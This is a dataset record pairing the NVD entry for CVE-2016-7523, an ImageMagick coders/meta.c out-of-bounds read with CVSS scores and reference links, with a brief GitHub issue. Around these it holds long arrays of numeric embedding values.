0.004833308048546314, 0.024619318544864655, 0.002874953206628561, 0.013583325780928135, 0.01647668518126011, -0.0038798984605818987, 0.011867924593389034, -0.00019590450392570347, -0.009997916407883167, -0.029434220865368843, -0.0003101342008449137, 0.0012672248994931579, 0.0034031937830150127, 0.011705955490469933, -0.0014816500479355454, 0.020687883719801903, 0.007767159026116133, -0.014842268079519272, 0.02058481238782406, -0.0021350483875721693, -0.01892094686627388, -0.015460696071386337, -0.001089610974304378, 0.017330704256892204, -0.005705732852220535, 0.007288613822311163, -0.017419051378965378, 0.016830071806907654, -0.0033995124977082014, 0.0036608718801289797, -0.02547333762049675, 0.00981386099010706, 0.00822361744940281, -0.004189112223684788, -0.01469502318650484, -0.003463932080194354, -0.011013905517756939, -0.008680076338350773, 0.0010546402772888541, 0.00026066918508149683, 0.013914626091718674, 0.015622665174305439, 0.005904513411223888, -0.010513273067772388, -0.0014457590878009796, 0.016565032303333282, -0.022940728813409805, -0.022940728813409805, 0.02112961746752262, 0.002267568837851286, 0.01578463427722454, -0.011860562488436699, -0.006799024995416403, -0.002197627443820238, 0.015328175388276577, 0.019701344892382622, -0.0042185611091554165, 0.0007463467190973461, -0.002258365973830223, 0.005580575205385685, 0.007406409364193678, 0.0005572292720898986, -0.00697939982637763, -0.0019270653137937188, 0.006338885519653559, -0.01889149844646454, 0.0003032321110367775, 0.020982373505830765, -0.009158621542155743, -0.0042443289421498775, 0.019745517522096634, -0.002199467970058322, -0.022970177233219147, -0.008429760113358498, -0.010483824647963047, -0.01890622265636921, -0.0000910501548787579, -0.0037234509363770485, -0.03583936393260956, 0.004262734670192003, 0.016373613849282265, -0.01055008452385664, -0.008680076338350773, -0.02908083237707615, 0.036781731992959976, -0.022381197661161423, 0.0052529554814100266, -0.01018197275698185, 0.05021044984459877, 0.00752420537173748, 0.014614039100706577, -0.02545861341059208, -0.010829849168658257, -0.003727131988853216, -0.016064399853348732, 0.022189779207110405, 0.04270096868276596, 0.010947645641863346, -0.02376529760658741, 0.008149995468556881, -0.015887705609202385, 0.02163024991750717, -0.0008471172768622637, 0.01528400182723999, -0.013524428009986877, -0.007041979115456343, 0.015195655636489391, 0.006287349853664637, 0.001801907317712903, 0.011013905517756939, 0.0012074067490175366, -0.01394407544285059, -0.0022289170883595943, 0.0039387964643538, -0.0047891344875097275, 0.01867063157260418, -0.032158248126506805, 0.00288231554441154, 0.004715512041002512, -0.00643459428101778, 0.011404103599488735, 0.00545173604041338, 0.022498993203043938, -0.007181861437857151, 0.020010557025671005, 0.01694786734879017, -0.003791551571339369, -0.005120435263961554, -0.0008728851098567247, -0.002560217631980777, 0.008878856897354126, -0.008606454357504845, -0.013568601571023464, 0.0026853757444769144, 0.01052799727767706, 0.0019105002284049988, -0.008422398008406162, -0.01152189914137125, 0.002884156070649624, -0.003601974109187722, -0.01008626352995634, 0.0007261005230247974, 0.006357290782034397, 0.006279987283051014, 0.007064065430313349, -0.011867924593389034, -0.023338288068771362, -0.022646239027380943, -0.0021921058651059866, 0.0019454709254205227, 0.0015092584071680903, 0.0039682453498244286, -0.034101877361536026, -0.004277459345757961, -0.0031068637035787106, -0.0373707115650177, 0.006475086789578199, -0.008923030458390713, -0.016093848273158073, -0.007284932769834995, -0.0216155257076025, 0.016859520226716995, 0.0052419123239815235, 0.0000687908977852203, -0.01213296502828598, 0.017065662890672684, -0.005731500685214996, -0.002718505682423711, 0.024560419842600822, -0.0034050343092530966, 0.022690411657094955, 0.015475420281291008, -0.02062898501753807, -0.0028197364881634712, 0.027785079553723335, -0.014599313959479332, 0.015018961392343044, -0.0040639545768499374, 0.0035890901926904917, -0.0009764165733940899, 0.014687661081552505, -0.031009739264845848, -0.010601620189845562, 0.0237947478890419, 0.008930392563343048, -0.017154010012745857, 0.011183236725628376, -0.01702149026095867, -0.023426635190844536, 0.0031087042298167944, -0.009578268975019455, 0.00545173604041338, 0.009762325324118137, -0.000048372192395618185, 0.011212686076760292, 0.0034418452996760607, 0.01117587462067604, 0.023382462561130524, -0.005249274428933859, 0.015519593842327595, 0.013156316243112087, -0.0002795348991639912, 0.016329439356923103, 0.0018884135643020272, -0.0036811181344091892, 0.005308172199875116, 0.016182195395231247, 0.001836877898313105, -0.011816388927400112, 0.004071316681802273, 0.008827321231365204, 0.010005278512835503, 0.007115601096302271, -0.030420759692788124, 0.024148134514689445, 0.02211615815758705, -0.007432177197188139, 0.0006299313390627503, -0.0012055662227794528, 0.0072149913758039474, 0.015063134953379631, -0.008900943212211132, 0.023456083610653877, -0.019009293988347054, 0.01055008452385664, 0.01127158384770155, -0.0038872607983648777, -0.004435747396200895, -0.009850672446191311, -0.01418702956289053, -0.012508438900113106, 0.0028786342591047287, -0.01625581830739975, -0.01409132033586502, -0.0024479434359818697, 0.004719193559139967, -0.006464043166488409, 0.0006409746711142361, -0.015902429819107056, -0.021424107253551483, -0.008893581107258797, 0.021041270345449448, 0.006751170381903648, 0.0023448721040040255, 0.010748865082859993, -0.001989644253626466, 0.012559974566102028, -0.0021663380321115255, -0.0043805306777358055, 0.004041867796331644, 0.010020003654062748, -0.0013417674927040935, 0.003314846893772483, 0.0024865951854735613, 0.006441956851631403, 0.009489922784268856, -0.012280209921300411, -0.002313582692295313, 0.015917154029011726, 0.0026191154029220343, 0.01115378737449646, -0.000009821107596508227, 0.01418702956289053, 0.006883690599352121, -0.014341635629534721, 0.020982373505830765, 0.014106044545769691, 0.03695842623710632, -0.006464043166488409, -0.0012110878014937043, -0.0042958646081388, 0.0037308132741600275, 0.008061648346483707, -0.019716069102287292, -0.0027810847386717796, -0.028020670637488365, -0.006062801461666822, -0.009732875972986221, 0.022440096363425255, -0.017330704256892204, 0.0006938907317817211, -0.0009175186860375106, -0.00254917424172163, 0.0022546849213540554, 0.00839294958859682, 0.005908194463700056, 0.009556182660162449, -0.003421599278226495, 0.00017542828572914004, 0.002449784195050597, -0.0029117644298821688, -0.005437011364847422, -0.0012874710373580456, -0.017109837383031845, 0.02765255980193615, -0.0065266224555671215, -0.0035670034121721983, -0.01368639711290598, -0.0040639545768499374, -0.0003655810432974249, 0.011956271715462208, -0.007292294874787331, 0.0010831690160557628, 0.00018566638755146414, -0.007443220820277929, 0.015917154029011726, -0.011632333509624004, -0.001759574399329722, 0.010108349844813347, 0.0023964077699929476, -0.009872758761048317, 0.005462779197841883, -0.013156316243112087, -0.012825015000998974, 0.012928086332976818, -0.02354443073272705, 0.011499812826514244, -0.025797275826334953, -0.003894622903317213, 0.017846060916781425, 0.00862854067236185, -0.006607607007026672, -0.007907041348516941, 0.004833308048546314, 0.0073622362688183784, 0.00005294482980389148, 0.03059745393693447, -0.003497062250971794, 0.016108572483062744, -0.010969731956720352, 0.017286529764533043, -0.005389156751334667, -0.008989290334284306, 0.009887482970952988, 0.016358889639377594, 0.0048149023205041885, 0.01628526672720909, 0.031127534806728363, -0.015475420281291008, -0.013767381198704243, 0.001045437529683113, -0.00333877420052886, 0.00898192822933197, 0.022263402119278908, -0.0021424107253551483, -0.02738751843571663, 0.013171040453016758, 0.022469544783234596, 0.008805234916508198, 0.019244885072112083, -0.0022657280787825584, 0.00076521240407601, -0.00239272671751678, 0.018862048164010048, 0.011116976849734783, 0.0025473337154835463, -0.007619914598762989, -0.008304602466523647, 0.02065843529999256, -0.011330481618642807, -0.0008425159030593932, -0.010152523405849934, 0.0264746006578207, -0.0007794767734594643, 0.0018736891215667129, -0.003736334852874279, 0.012589423917233944, -0.004490964114665985, -0.006533984560519457, -0.0032044132240116596, -0.015254553407430649, 0.010977094061672688, -0.014488880522549152, 0.015055772848427296, -0.008098459802567959, 0.01769881509244442, -0.0008323928341269493, -0.006681229453533888, 0.010638431645929813, -0.01796385645866394, 0.0016049675177782774, 0.011404103599488735, -0.0030792553443461657, 0.01250107679516077, -0.0011926823062822223, -0.012250760570168495, 0.004884843714535236, -0.009018739685416222, -0.009622442536056042, -0.007568378932774067, -0.008900943212211132, -0.010719415731728077, 0.01296489778906107, 0.006316798739135265, 0.016682827845215797, -0.002094556111842394, 0.003813638351857662, 0.024692939594388008, -0.007538930047303438, 0.007826057262718678, 0.005348664708435535, -0.018346693366765976, 0.00981386099010706, 0.012648321688175201, 0.0037676242645829916, 0.018729528412222862, 0.005886107683181763, -0.0030258791521191597, -0.003031400730833411, 0.030391311272978783, 0.0002436439972370863, -0.01528400182723999, 0.01479073241353035, -0.012574699707329273, 0.0042958646081388, 0.0015525115886703134, 0.005838253069669008, -0.002709302818402648, 0.0023356694728136063, 0.009909570217132568, 0.008083735592663288, -0.020790955051779747, 0.025119949132204056, -0.004697106778621674, -0.008334050886332989, -0.007321743760257959, -0.0009810179471969604, 0.00667754840105772, 0.0004405838262755424, 0.02422175742685795, 0.014481518417596817, -0.011624970473349094, 0.005900832358747721, -0.0006718040676787496, 0.009688702411949635, -0.010159885510802269, -0.02619483694434166, 0.0016997562488541007, 0.0035062648821622133, 0.005992860067635775, 0.006265263073146343, 0.013760019093751907, -0.010358666069805622, -0.0022970177233219147, -0.007951214909553528, -0.022881830111145973, 0.01920071244239807, -0.0025160443037748337, 0.002083512721583247, 0.000022460571926785633, 0.011470364406704903, -0.01127158384770155, 0.0003347516758367419, 0.006688591558486223, 0.00576463108882308, 0.009747601114213467, -0.01372320856899023, 0.0063536097295582294, -0.01127158384770155, 0.024854909628629684, -0.0029062426183372736, 0.02545861341059208, 0.014032422564923763, -0.009799136780202389, -0.00003790401387959719, 0.0014494402566924691, -0.0026172748766839504, 0.023146869614720345, 0.00045208731899037957, -0.0012322543188929558, -0.007619914598762989, -0.015475420281291008, 0.009195432998239994, -0.0005954208318144083, -0.01128630805760622, -0.009246968664228916, 0.013988249003887177, 0.005562169477343559, 0.007899679243564606, 0.022498993203043938, -0.013642223551869392, -0.0000061975074459041934, -0.015195655636489391, -0.03036186285316944, 0.027696732431650162, -0.007244440261274576, 0.00859909225255251, 0.006092250347137451, -0.002199467970058322, 0.008709525689482689, 0.0005148964119143784, 0.019347956404089928, -0.009497284889221191, 0.0072297160513699055, -0.008827321231365204, 0.002420335076749325, 0.0049216547049582005, -0.002470030216500163, 0.017139285802841187, -0.0005972614162601531, 0.007351192645728588, 0.006118018180131912, 0.008275153115391731, -0.0007339229341596365, -0.016830071806907654, -0.0060775261372327805, -0.010248232632875443, 0.0030001113191246986, -0.04302490875124931, 0.01847921311855316, -0.015460696071386337, -0.0019583548419177532, -0.0029669811483472586, 0.010388115420937538, 0.0035485979169607162, 0.018965119495987892, -0.02961091324687004, 0.017404327169060707, -0.008783147670328617, -0.010248232632875443, -0.01554904319345951, 0.004340038169175386, 0.00026941183023154736, 0.005013682879507542, 0.03230549395084381, -0.02476656250655651, 0.0046087596565485, 0.02519357204437256, -0.017065662890672684, 0.0074579450301826, 0.019215436652302742, 0.002574942074716091, 0.010233508422970772, -0.003208094509318471, -0.0007049341220408678, -0.009173346683382988, -0.03742960840463638, -0.00046727192238904536, -0.0038283627945929766, -0.013568601571023464, -0.022145606577396393, 0.0006892893579788506, -0.01987803727388382, 0.01796385645866394, -0.011919460259377956, -0.003769465023651719, -0.025605857372283936, -0.009710789658129215, -0.0011834794422611594, 0.011772215366363525, 0.000036782421375392005, 0.009997916407883167, 0.0038210004568099976, -0.010712053626775742, 0.007502118591219187, 0.020967649295926094, -0.010410201735794544, -0.0012469787616282701, -0.0006299313390627503, -0.0006299313390627503, -0.00887149479240179, 0.02762310951948166, -0.008842045441269875, 0.004987915046513081, -0.006390421185642481, -0.014606676995754242, -0.0056394729763269424, -0.004969509318470955, 0.016152746975421906, -0.008105821907520294, 0.01962772198021412, 0.02519357204437256, 0.007292294874787331, 0.017610469833016396, 0.03106863610446453, -0.015328175388276577, 0.0032669922802597284, 0.01296489778906107, 0.015843532979488373, 0.0002161506563425064, -0.00036696146707981825, -0.011404103599488735, 0.0043658060021698475, -0.008363500237464905, -0.01599077694118023, 0.01199308317154646, -0.0017273646080866456, 0.005613705143332481, 0.0018092695390805602, 0.00044610549230128527, -0.001336245913989842, 0.005646835081279278, 0.00154698989354074, 0.0063793775625526905, 0.005897151306271553, 0.03327730670571327, 0.004807540215551853, -0.021011821925640106, 0.010027365759015083, 0.005598980467766523, 0.014017697423696518, -0.013649585656821728, 0.011698593385517597, -0.000006862553163955454, -0.011499812826514244, -0.0020098905079066753, 0.007152412552386522, 0.009769687429070473, -0.02478128671646118, 0.012692495249211788, -0.002100077923387289, -0.02981705591082573, 0.008657990023493767, 0.014643487520515919, 0.022764034569263458, -0.0028970399871468544, -0.014017697423696518, 0.00666650477796793, 0.014245927333831787, -0.0002263887581648305, 0.008945116773247719, 0.0007247201283462346, -0.008164719678461552, 0.00076521240407601, 0.001599445822648704, 0.0010675241937860847, 0.0004992516478523612, 0.013303561136126518, -0.024854909628629684, -0.004358443897217512, 0.010461737401783466, 0.010343941859900951, 0.013266749680042267, -0.0037308132741600275, 0.01322257611900568, -0.012972259894013405, 0.020732056349515915, -0.014621401205658913, 0.02062898501753807, 0.02139465883374214, -0.0038467682898044586, 0.02812374196946621, -0.006592882331460714, -0.002689056796953082, 0.0030037923716008663, 0.01722763292491436, 0.019303783774375916, -0.011647057719528675, -0.004862756934016943, -0.01744849979877472, 0.006291030906140804, -0.008856769651174545, 0.012817652896046638, 0.0021939463913440704, 0.006868966389447451, -0.026268457993865013, -0.01127158384770155, 0.014017697423696518, 0.00005953058280283585, -0.012294934131205082, -0.01964244619011879, -0.002204989781603217, 0.019701344892382622, -0.009990554302930832, -0.01697731576859951, -0.002551014767959714, 0.005186695605516434, -0.02329411543905735, 0.01104335393756628, 0.002884156070649624, 0.006014946848154068, -0.023941991850733757, 0.017095113173127174, 0.00031772651709616184, 0.011352567933499813, 0.004027143120765686, -0.013752656988799572, 0.0016887129750102758, -0.00703461654484272, 0.021424107253551483, 0.02570892870426178, -0.023897819221019745, -0.011948909610509872, 0.018862048164010048, 0.017890233546495438, 0.004321632441133261, -0.007722985930740833, -0.010881384834647179, -0.008731612004339695, -0.0071008768863976, -0.012788204476237297, 0.017124561592936516, 0.010410201735794544, 0.011617608368396759, -0.01627054251730442, -0.022233953699469566, -0.017345428466796875, -0.026371529325842857, 0.015872981399297714, -0.011580797843635082, 0.025782551616430283, -0.0035559600219130516, 0.027770355343818665, 0.0095929941162467, 0.013178402557969093, -0.009099723771214485, -0.00009478878928348422, 0.007270208094269037, -0.027063580229878426, -0.005337621085345745, -0.005138840992003679, 0.0021921058651059866, 0.01102862972766161, 0.012059343047440052, -0.004119171295315027, 0.0025399713777005672, 0.007575741037726402, 0.007774521596729755, -0.003364542033523321, 0.024634042754769325, 0.005779355298727751, -0.0017347269458696246, -0.008842045441269875, 0.016196919605135918, -0.0005972614162601531, -0.030214617028832436, -0.007848143577575684, -0.01526927761733532, 0.005871383473277092, 0.03851921856403351, 0.00697939982637763, -0.01395879965275526, 0.008532831445336342, -0.00048498730757273734, -0.016844796016812325, -0.02082040347158909, 0.01069732941687107, -0.009791773743927479, 0.03563322126865387, -0.0019822821486741304, -0.006302074063569307, 0.02230757474899292, 0.002146091777831316, 0.007936490699648857, -0.010299768298864365, 0.014481518417596817, 0.003712407546117902, -0.011728041805326939, 0.009121811017394066, -0.0016104892129078507, -0.022160330787301064, 0.004833308048546314, 0.0019049786496907473, -0.00909236166626215, -0.009732875972986221, -0.013951437547802925, 0.00209271558560431, 0.003443686058744788, 0.006894734222441912, 0.023146869614720345, -0.008672714233398438, -0.009556182660162449, 0.0029044020920991898, -0.009578268975019455, 0.0135759636759758, -0.01962772198021412, -0.002908083377406001, -0.0009810179471969604, 0.012088791467249393, -0.0005029327585361898, -0.0036074956879019737, -0.0020816721953451633, 0.012294934131205082, 0.0029945895075798035, -0.014385809190571308, -0.007568378932774067, -0.00789231713861227, -0.008039562031626701, -0.012552612461149693, -0.006957313045859337, 0.020084179937839508, -0.004369487054646015, -0.02422175742685795, -0.014967425726354122, 0.02235174924135208, 0.0033719041384756565, 0.0076640876941382885, 0.0053744325414299965, 0.008267791010439396, -0.002611753297969699, -0.007410090882331133, -0.0034308021422475576, 0.02498742938041687, 0.007921766489744186, 0.009696065448224545, -0.0004159663512837142, -0.02305852435529232, -0.0054922280833125114, -0.006213727407157421, 0.014989512972533703, 0.0007661327254027128, 0.01322257611900568, -0.004756004549562931, -0.016697552055120468, 0.013185764662921429, 0.005514314863830805, -0.0025399713777005672, -0.013568601571023464, 0.010270319879055023, -0.0024019295815378428, -0.02451624721288681, -0.007487394381314516, 0.00641987007111311, 0.0025638986844569445, 0.019053466618061066, -0.015946604311466217, 0.0065523902885615826, -0.015372348949313164, 0.005488547030836344, 0.008230980485677719, -0.001266304636374116, -0.013045882806181908, -0.0017384079983457923, 0.01749267242848873, -0.017625194042921066, -0.020467016845941544, -0.008716887794435024, 0.005473822820931673, 0.0015368667664006352, -0.003279876196756959, -0.0014347158139571548, 0.013031157664954662, 0.01572573557496071, 0.002689056796953082, -0.0006754851783625782, -0.004097084514796734, 0.011941547505557537, 0.013708483427762985, -0.03368959203362465, 0.016933143138885498, -0.014268013648688793, -0.008702163584530354, -0.012228674255311489, -0.001732886303216219, -0.0031307910103350878, -0.02107072062790394, -0.01602022536098957, 0.005985497962683439, -0.026975233107805252, 0.027829252183437347, 0.010277681984007359, 0.02252844348549843, -0.011013905517756939, -0.004299546126276255, -0.01417966652661562, 0.00933531578630209, 0.0034492076374590397, -0.007612552028149366, 0.003287238534539938, -0.00009312078327639028, -0.009372126311063766, 0.0078775929287076, -0.007480031810700893, 0.054215505719184875, 0.0035633223596960306, -0.02108544483780861, -0.002170019084587693, -0.0005139760905876756, 0.00318232667632401, -0.0007067746482789516, -0.01844976469874382, -0.026356805115938187, 0.011072803288698196, -0.01371584553271532, -0.004270096775144339, -0.006872647441923618, -0.012155052274465561, -0.00552167696878314, -0.006136423908174038, 0.008554918691515923, -0.0029504161793738604, -0.0295814648270607, 0.0003209474962204695, 0.001072125625796616, -0.025900347158312798, 0.02375057339668274, 0.01939213089644909, 0.01528400182723999, -0.005731500685214996, 0.013171040453016758, 0.012876550666987896, 0.005952368024736643, -0.02454569563269615, 0.01940685510635376, 0.0009957423899322748, -0.005293447989970446, 0.0054922280833125114, 0.013951437547802925, 0.007767159026116133, 0.006990443449467421, 0.015578491613268852, -0.021483005955815315, -0.012000445276498795, 0.011919460259377956, 0.02280820719897747, -0.009254330769181252, -0.012250760570168495, -0.0020890345331281424, -0.006346247624605894, -0.017993304878473282, -0.03848977014422417, 0.02208670787513256, -0.013826279900968075, -0.010542722418904305, 0.019524650648236275, 0.004844351205974817, -0.007119282148778439, -0.002630158793181181, -0.013988249003887177, -0.0004626705194823444, 0.0032301810570061207, -0.011124338954687119, -0.007336468435823917, -0.02084985375404358, -0.008407673798501492, -0.010572170838713646, 0.0049363793805241585, 0.0007928208215162158, 0.006983080878853798, 0.03357179835438728, 0.02082040347158909, 0.0005443453555926681, 0.0027313895989209414, -0.00800275057554245, -0.005013682879507542, 0.00011894612543983385, 0.00822361744940281, -0.013546514324843884, -0.0021055995021015406, 0.019524650648236275, 0.005407562479376793, 0.013605412095785141, -0.005510633811354637, -0.017050938680768013, -0.020952923223376274, -0.018744252622127533, -0.0030718930065631866, -0.005061537493020296, -0.016299990937113762, -0.007612552028149366, -0.0015543521149083972, -0.0009828584734350443, 0.011102251708507538, 0.009254330769181252, 0.01597605273127556, -0.014996875077486038, 0.026077041402459145, -0.01624109223484993, 0.005333940032869577, 0.009894845075905323, -0.00947519764304161, 0.010513273067772388, 0.0019988471176475286, -0.024692939594388008, 0.00314919650554657, -0.03999166563153267, -0.008694800548255444, -0.01797858066856861, -0.016314715147018433, -0.029242802411317825, -0.03174596279859543, -0.012699857354164124, 0.00789231713861227, -0.01165441982448101, 0.02503160387277603, -0.010432288981974125, -0.007553654257208109, -0.009968467988073826, -0.010262956842780113, 0.002146091777831316, 0.005510633811354637, 0.018022753298282623, -0.005985497962683439, 0.008083735592663288, -0.004549861885607243, 0.023838920518755913, 0.002803171519190073, 0.023824196308851242, -0.0006460362346842885, -0.001802827580831945, 0.008451847359538078, 0.0023227855563163757, 0.0012405368033796549, -0.010770951397716999, 0.007855505682528019, 0.010682604275643826, 0.001142987166531384, -0.005260317586362362, 0.025870898738503456, 0.02280820719897747, 0.005205100867897272, 0.007929128594696522, -0.00054526561871171, -0.0017172415973618627, 0.044497355818748474, 0.0017650960944592953, -0.0057830363512039185, -0.0249727051705122, -0.007439539767801762, -0.000509834848344326, -0.0016160107916221023, 0.0033295713365077972, -0.0249727051705122, 0.03569212183356285, 0.012191862799227238, 0.02841823175549507, -0.0023687994107604027, -0.0033553391695022583, 0.013075331225991249, 0.00971815176308155, 0.02015780285000801, -0.02815319038927555, 0.003171283286064863, 0.0013417674927040935, -0.011735404841601849, -0.0042185611091554165, 0.011080165393650532, 0.0022362791933119297, 0.006007584743201733, -0.0030461251735687256, -0.004167025443166494, 0.01468029897660017, -0.011131701059639454, -0.0007771760574541986, 0.023456083610653877, 0.004299546126276255, 0.010631068609654903, 0.02332356385886669, -0.004457834176719189, 0.014444706961512566, 0.0030277196783572435, 0.016550306230783463, 0.029286975041031837, -0.004597716499119997, -0.02110016904771328, -0.021659698337316513, -0.0044983262196183205, -0.006320479791611433, 0.00715609360486269, -0.01333300955593586, -0.0060996124520897865, 0.02738751843571663, 0.004859075881540775, 0.003016676288098097, -0.006920502055436373, -0.009401575662195683, -0.011514537036418915, 0.005477503873407841, -0.02158607728779316, -0.004715512041002512, 0.0019914847798645496, 0.011683869175612926, -0.013877815566956997, -0.0021847435273230076, -0.006559752393513918, -0.012559974566102028, 0.017757713794708252 ]
1,787
CVE-2016-7523
2020-02-06T14:15:10.737000
coders/meta.c in ImageMagick allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/09/22/2" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537420" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1378754" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/94" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:-:*:*:*:*:*:*:*", "matchCriteriaId": "6E6BE7A5-6FF7-4916-B671-9EE11CA54F65", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/94
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537420
heap-buffer-overflow in coders/meta.c:496
https://api.github.com/repos/ImageMagick/ImageMagick/issues/94/comments
2
2016-01-24T01:29:08
2016-01-25T00:23:16Z
https://github.com/ImageMagick/ImageMagick/issues/94
128,365,381
94
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : heap-buffer-overflow in coders/meta.c:496 Issue date: --- start body --- https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537420 --- end body ---
225
[ -0.02095128782093525, 0.015636060386896133, -0.006363437976688147, 0.0253505427390337, 0.03008522465825081, 0.033233076333999634, -0.0422896072268486, 0.038754723966121674, -0.024292657151818275, 0.038083869963884354, 0.017532512545585632, -0.014978107064962387, 0.0075858114287257195, 0.024950610473752022, 0.008043798618018627, 0.01577797159552574, -0.01655203476548195, 0.03147853538393974, -0.013378378003835678, -0.018474288284778595, -0.004947548732161522, -0.03233000636100769, -0.008972672745585442, 0.01670684665441513, -0.02554405853152275, -0.0013134870678186417, -0.0011554493103176355, 0.00038037908961996436, 0.029775599017739296, 0.019299956038594246, 0.020860981196165085, 0.01950637251138687, -0.002526991069316864, 0.024434568360447884, 0.02773723565042019, -0.005347480997443199, 0.014681383036077023, 0.08411477506160736, -0.020228831097483635, -0.014281450770795345, 0.013055851683020592, -0.05686778202652931, -0.007876085117459297, 0.021093199029564857, -0.0031285020522773266, -0.01897742971777916, -0.012294691056013107, -0.04685657471418381, -0.03702598437666893, 0.00732779037207365, 0.044353775680065155, -0.008701751008629799, -0.03362010791897774, -0.04012223333120346, -0.006369888316839933, -0.0023963681887835264, 0.031014099717140198, 0.031014099717140198, -0.01994500681757927, 0.008888816460967064, -0.03996742144227028, 0.0314011313021183, 0.021828558295965195, 0.010675610043108463, -0.01751961186528206, -0.013623497448861599, -0.0114109693095088, 0.0012393061770126224, 0.001428790157660842, 0.023944329470396042, 0.0019641832914203405, -0.03274283930659294, 0.020254632458090782, 0.03057546354830265, 0.01890002377331257, -0.004263793583959341, 0.014668482355773449, 0.02923375554382801, -0.04324428364634514, 0.009688680991530418, -0.05795146897435188, 0.013062302954494953, -0.014036331325769424, 0.03385232761502266, 0.029853004962205887, -0.022615522146224976, -0.019183846190571785, -0.07518725842237473, -0.03578748553991318, -0.010391787625849247, -0.005105586256831884, 0.033310484141111374, 0.0035348848905414343, 0.02073197066783905, 0.004983026534318924, 0.002875319216400385, 0.010785269550979137, -0.029465975239872932, -0.029801402240991592, 0.006347311660647392, -0.019557975232601166, -0.019041934981942177, -0.007927688769996166, -0.02907894365489483, 0.008637245744466782, 0.008940420113503933, 0.016642341390252113, -0.05722901225090027, 0.034058745950460434, 0.09526127576828003, 0.01580377295613289, -0.009720933623611927, -0.038419295102357864, 0.015558653511106968, 0.021093199029564857, 0.02568596974015236, -0.012255988083779812, -0.025969792157411575, -0.028691912069916725, -0.026382626965641975, -0.025634365156292915, -0.04123172163963318, -0.01741640269756317, 0.026034297421574593, -0.024253955110907555, 0.027117986232042313, -0.026498734951019287, -0.0013594470219686627, -0.010056360624730587, -0.008643697015941143, -0.00036304330569691956, -0.016874559223651886, 0.0293111614882946, -0.026047199964523315, -0.030523858964443207, -0.006595656741410494, -0.0339297354221344, 0.053307097405195236, 0.028046859428286552, 0.00737294415012002, -0.06140894815325737, -0.030549662187695503, 0.0005241047474555671, -0.01536513864994049, -0.03230420500040054, 0.006382789462804794, -0.029698193073272705, 0.012946193106472492, -0.0130881043151021, -0.026679350063204765, -0.03274283930659294, -0.029698193073272705, 0.003563912119716406, 0.005682907998561859, 0.04517944157123566, 0.005495843011885881, 0.01722288876771927, 0.04061247408390045, -0.026227813214063644, -0.012939742766320705, -0.007314889691770077, -0.023737912997603416, 0.03483280539512634, -0.002099644159898162, -0.005670006852596998, -0.02408624067902565, -0.0030140054877847433, 0.01834527775645256, 0.006676287855952978, 0.018203366547822952, -0.008850113488733768, -0.008385675959289074, 0.02215108461678028, -0.0028027507942169905, -0.026756756007671356, 0.02053845487535, 0.011939912103116512, -0.004544391296803951, -0.01819046586751938, -0.01407503429800272, -0.018474288284778595, 0.0077535249292850494, -0.004070277791470289, -0.004012223333120346, 0.008779157884418964, -0.006302157882601023, 0.00917263887822628, -0.014100836589932442, -0.0017287393566220999, -0.026576140895485878, -0.01262366771697998, -0.0057699899189174175, 0.011604485101997852, -0.027582421898841858, 0.029672391712665558, -0.016900362446904182, -0.056248534470796585, -0.047140397131443024, 0.024434568360447884, -0.005570023786276579, 0.0364583395421505, 0.0014513669302687049, -0.03483280539512634, -0.01939026266336441, -0.00855983980000019, 0.01094008143991232, -0.013675102032721043, 0.015945684164762497, 0.021041596308350563, 0.00016600009985268116, 0.00814700685441494, -0.01915804296731949, 0.00201417482458055, 0.023170266300439835, -0.02554405853152275, 0.019467668607831, -0.004021899309009314, 0.001741640386171639, -0.017687324434518814, 0.023286376148462296, 0.031452734023332596, -0.020151423290371895, -0.011062641628086567, -0.021299617365002632, -0.020667465403676033, -0.02568596974015236, 0.0022463935893028975, -0.02132541872560978, -0.03759362921118736, 0.00909523293375969, -0.0040993052534759045, -0.02747921459376812, 0.012630118057131767, -0.019287053495645523, -0.004096080083400011, -0.02017722651362419, 0.003081735922023654, -0.008804959245026112, -0.01850009150803089, 0.012681721709668636, 0.02915634959936142, 0.02990460954606533, -0.01398472674190998, -0.026988975703716278, 0.0018109834054484963, 0.04027704522013664, -0.0009030727669596672, -0.026601944118738174, -0.0381096713244915, 0.0030833485070616007, 0.010920730419456959, -0.009385506622493267, 0.012023769319057465, 0.0031301146373152733, 0.011527079157531261, 0.003104312578216195, 0.016732648015022278, 0.00917263887822628, -0.0033349187579005957, -0.027917848899960518, 